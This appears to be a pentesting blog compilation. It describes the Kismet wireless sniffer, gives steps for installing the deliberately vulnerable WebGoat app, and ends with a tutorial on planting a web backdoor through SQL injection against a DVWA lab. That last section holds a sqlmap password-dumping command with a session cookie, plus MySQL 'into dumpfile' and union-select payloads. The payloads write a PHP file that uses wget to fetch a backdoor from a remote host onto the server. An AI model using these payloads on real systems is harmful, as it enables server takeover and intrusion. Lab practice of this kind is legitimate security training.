Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones, there's only one supported wireless hardware available as packet source.


Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.
Kismet has the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible fileformat. Kismet also captures PPI headers.
Kismet also has the ability to detect default or "not configured" networks, probe requests, and determine what levels of wireless encryptions is used on a given access point.
To find as many networks as possible, kismet supports channelhopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big holes between channels (for example 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage with this method is that it will capture more packets because adjacent channels overlap.
Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.

How to install webgoat in backtrack

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

1. Before installing firs download webgoat from this link .
2. To extract the file format 7zip, install p7zip by :
    apt-get install p7zip
3. Now extract webgoat file :
    p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z
4. if the extract has been completed, go into the folder extract :
    cd WebGoat-OWASP_Standard-5.3_RC1
5. change the file permissions webgoat.sh to be executable  by this commant :
    chmod +x webgoat.sh
6. webgoat need to run the OpenJDK-6-jre and openjdk-6-jdk, and to get it can use the following command :
    apt-get install openjdk-6-jre openjdk-6-jdk
7. After installation is now ready to run webgoat on port 80 or 8080 by this commant:
    ./webgoat.sh start80 or ./webgoat star8080


Now we can open webgoat from browser bay this url http://127.0.0.1/webgoat/attack

Generate backdoor from SQL injection

To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple :

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password

after we got the password, now we enter to mysql with the following sintax:

root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p 


then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :

mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)

now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php

Other way :
we just insert the sql query to vulnerable form like this :

 1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php

and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.

<thi sample tested in DVWA>